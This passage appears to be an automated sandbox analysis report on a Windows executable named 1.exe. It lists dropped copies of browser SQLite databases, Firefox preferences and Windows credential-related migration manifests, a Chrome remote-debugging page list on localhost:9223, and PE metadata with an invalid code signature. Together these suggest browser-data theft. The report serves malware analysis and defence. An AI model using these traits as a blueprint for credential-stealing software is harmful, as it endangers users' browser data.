SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\va1vs\pp8q1n

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\va1vs\uai5x4

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\va1vs\va1ngv

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	889
Entropy (8bit):	5.016955029110262
Encrypted:	false
SSDEEP:	24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
MD5:	2948FF1C0804EC7DB473BB77EB3FBE4E
SHA1:	98A97AFC0E4E2B09A17AA0746F455DFD24356357
SHA-256:	2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
SHA-512:	8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\ [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..

C:\ProgramData\va1vs\vk6xlx

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\va1vs\vs26f3

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	8193
Entropy (8bit):	5.027484893998515
Encrypted:	false
SSDEEP:	96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
MD5:	2D6ACF2AEC5E5349B16581C8AE23BF3E
SHA1:	0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
SHA-256:	B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
SHA-512:	7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,

C:\ProgramData\va1vs\wbiekf

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1468
Entropy (8bit):	5.0065780470180306
Encrypted:	false
SSDEEP:	24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
MD5:	E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
SHA1:	A1120341BB4452FCA47EB5EA8FA62A08BFC48073
SHA-256:	A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
SHA-512:	69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.383374097069936
Encrypted:	false
SSDEEP:	48:SfNaoCxAMTECmfNaoC8crcdC8cgfNaoCyXgCygfNaoC+q0UrU0U8CV:6NnCpTECONnC8crcdC8csNnCJCfNnChA
MD5:	ED722616F518E37A6ECD82791E135FB4
SHA1:	548C3D4254A80120EA0426B36B830CE2AA49BF72
SHA-256:	FF46A0800C635B9910AEA6FACF6B7F7194324D827CBE358C3E59C934776941FD
SHA-512:	661017A1572AB462BC62F6ABB8A149A3BF4007D9922B7FE0A19C5FC5AB2B44ECF473765EE8C019BECD82494645F8FAC39FE5841703BD17632FB092C2421C10C1
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4E75E58E3AE1BE880215B790B2463B1B",.. "id": "4E75E58E3AE1BE880215B790B2463B1B",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4E75E58E3AE1BE880215B790B2463B1B"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/56E7D493470F9B930B8C5D64AB057041",.. "id": "56E7D493470F9B930B8C5D64AB057041",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/56E7D493470F9B930B8C5D64AB057041"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (7476)
Category:	downloaded
Size (bytes):	7481
Entropy (8bit):	5.801566039978096
Encrypted:	false
SSDEEP:	192:rbvN6666WSM4t0zYhHNoLqQ316K9+XwFd66666CbnuH1UgZp9+:fF6666Y4t0EtFQ3IK9+266666CbXgZp8
MD5:	64779CAC14FC34986B383BBFF23F4BD5
SHA1:	336B920C0F5ECD1BDF518242F2EF9EBA2EF6441B
SHA-256:	9D4D52A9C02C819FE01B1C0C183D9A05764A268BD8565ABB8D8C9E071729FE6D
SHA-512:	C1EB92A96AC46B26D5A1B06ADB71161417223DD9D789EA5AF7781EA064772D773B83C366EA293ABAA112A5C68EE4DADC77BD4445F7A08EB5A43636F255E8BD8B
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["fellowship gameplay","ss united states ship","weather forecast snow storm","phish summer tour 2025","minnesota vikings","mtg magic final fantasy","daytona 500 nascar race","southwest airlines layoffs"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wNTFxNRINRm9vdGJhbGwgdGVhbTKvHWRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQkVRQUNFUUVERVFIL3hBQWFBQUFEQVFFQkFRQUFBQUFBQUFBQUFBQUZCZ2NFQXdFQy84UUFOQkFBQVFRQkFnUUVCQVVEQlFBQUFBQUFBUUlEQkJFRkJpRUFFakZCQnhNaVVSUmhjWkVWTW9HeHdrSnlvUllqSkZKaS84UUFHZ0VBQWdNQkFRQUFBQUFBQ

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.349865760247148
Encrypted:	false
SSDEEP:	96:mtOTUb1db1ClNY5co7shdiUYVqig7O7aZCUgpgXEt94k+g8IHh8u928DoCLQ:mtOT8TfL1Vqig7mIg8IB8u88DA
MD5:	70A8F21806E7F1B739937970EBE49A0C
SHA1:	6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
SHA-256:	C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
SHA-512:	3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.S4XVq7ljTQU.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTu2DxB2kN0cQ82G6LVzDDDtDSuJSg"
Preview:	.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1437)
Category:	downloaded
Size (bytes):	117390
Entropy (8bit):	5.490758436358278
Encrypted:	false
SSDEEP:	3072:jMyvhJyj1UjPEWKcxUww3wM0W/N79419n5QJEx:jMyfyj1cPPC70W/Na5QJEx
MD5:	B52266FAD5115039E3806FF8DCD71F86
SHA1:	8007278E322C8EA9F3CB5B62008E3E3599E9F659
SHA-256:	E390D05D78F6E51B03F7C3D1D0C3B7C3E79B3D53C4F83685CFAD83D2E863456E
SHA-512:	58293A89F48926A7059F6C91AA79EBD941072D3BC31AA571342ABA76F007981750620F960CCB59E9E3C828FC8E1748B500E3138381D82EF8A171AD7C60F5C5FC
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var aa,ea,la,oa,ya,Ba,Ca;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.la=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.na=la(this);oa=function(a,b){if(b)a:{var c=_.na;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.oa("Symbol",function(a){if(a)return a;var b

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	131481
Entropy (8bit):	5.435653214214487
Encrypted:	false
SSDEEP:	3072:M+hkNTnEuSc2PDZgBDF0/I9J4rFlRW1/6z6x0zV:jwTWdPD+BDF0/I9J45lRW1/46AV
MD5:	D42E48478EE36272E0B96F6DAA95FB0B
SHA1:	79D61ED73BF1F840C7C76DE04781F8BC55DC6478
SHA-256:	1A4A6F3ED2CDB6121D1A878266C07F6078DAAA2F1FEBEAEED991067EF485A412
SHA-512:	4802A1034C934BDCDB8233FEE86380C31DD7F701338E476A89BAB056E48CC04F5FD8AF56E5F00EF5A17641CBA3972A6AC7589C552E011F6D980ADD59899101B2
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2412)
Category:	downloaded
Size (bytes):	171792
Entropy (8bit):	5.558231582485224
Encrypted:	false
SSDEEP:	3072:n+6rx4p7YzAtBwmc3S9t6wgKFfsBZxDDi9r2kRI/Y43qD+OvYPZtCflksnJ06jyH:n+6rGp7YzAtBwmuS9t6wgYfsBZxDDGr8
MD5:	FA34C77FDD078DB6063902D4A422A82E
SHA1:	72800E449AA5566CB41D32BC82C4756C44CF70E2
SHA-256:	976FFF621149FE56750857B770D2A8057903E4BE1EF8D65AFAA41FBA41AA3D01
SHA-512:	459009A55985236741DD580B7AC3D1D690938957970DF7C4B0FEE1D0607EBB5B23C7A723BC79AB7316A5118F628F2DB7A0297A877E3F8292C4C8E6B31A668652
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.MBb5Bwk2tpw.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTuTBR3s6b51Gqshrmn-C4xjmRsD3w"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Mi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Ni=class extends _.P{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Oi,Ri,Si,Ui,Vi,Yi;Oi=function(){return typeof BigInt==="function"};Ri=function(a){const b=a>>>0;_.Pi=b;_.Qi=(a-b)/4294967296>>>0};Si=function(a,b){b=~b;a?a=~a+1:b+=1;return[a,b]};_.Ti=function(a){if(a<0){Ri(-a);const [b,c]=Si(_.Pi,_.Qi);_.Pi=b>>>0;_.Qi=c>>>0}else Ri(a)};Ui=function(a){a=String(a);return"0000000".slice(a.length)+a};.Vi=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296b+a);else Oi()?c=""+(BigInt(b)<<BigInt(32)\|BigInt(a)):(c=(a>>>24\|b<<8)&16777215,b=b>>16&65535,a=(a&16777215)+c6777216+b6710656,c+=b8147497,b*=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+Ui(c)+Ui(a));return c};_.Wi=function(a,b){if(b&2147483648)if(Oi())a=""+(BigInt(b\|0)<<BigInt(32)\|BigInt(a>>>0));else{const [c,d]=Si(a,b);a="-"+Vi(c,d)}else a=Vi(a,b);return a};._.Xi

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.334636438216162
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1.exe
File size:	1'622'632 bytes
MD5:	efc2de49c53a388807ef989c2f6efa46
SHA1:	4ae5eeb4363c9f8b04bab4a1e40e4f057f74896c
SHA256:	1fed343aeac08b762cc565480913c8d0abfde1f3b18c79dc9e0a5133da903c46
SHA512:	3d4cdb9470c652edbf7b900f66b7885da903fe735d3fe08f7db6c7f082fe8c18630280dbb1b1476529135cb43ffd09b6247a798955e9e34456b3eb890c89f2b1
SSDEEP:	24576:dRrnyyHUF9Du6bbPJJ2sm5ChFzK8Pka0HEI1od8RbEYdmJl57BWBBkok4+i/Hjzw:dJvHku6iT5kK84Y8R7duWxk4+wHjzUBX
TLSH:	12757D50FDEB54B5E60646325967A3BF2335B2095735CFCBC9404EAAED07AE10E33262
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........:..............."...v.......e.......`....@..........................`......{.....@................................

File Icon


Icon Hash:	2f232d67b7934633

Static PE Info

General

Entrypoint:	0x4565f0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	167344a4df394fbba605fc972e41437a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Certum Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	28/10/2024 08:03:47 28/10/2025 08:03:46
Subject Chain	CN="Open Source Developer, Dimitry Polivaev", O=Open Source Developer, L=M\xfcnchen, S=Bayern, C=DE
Version:	3
Thumbprint MD5:	E41E0414A7DC972CDBD60AB713C456F0
Thumbprint SHA-1:	7CE22A53FFE51CF85FC5EABCE25B6F9AF41D2398
Thumbprint SHA-256:	230CB2B50E71C86245D6F3DA800ABC887A808119CF6B80218689751095C9D4A7
Serial:	450FA3932FA6CCB4ABA41415710C8903

Entrypoint Preview

Instruction
jmp 00007FF3E4B14DC0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
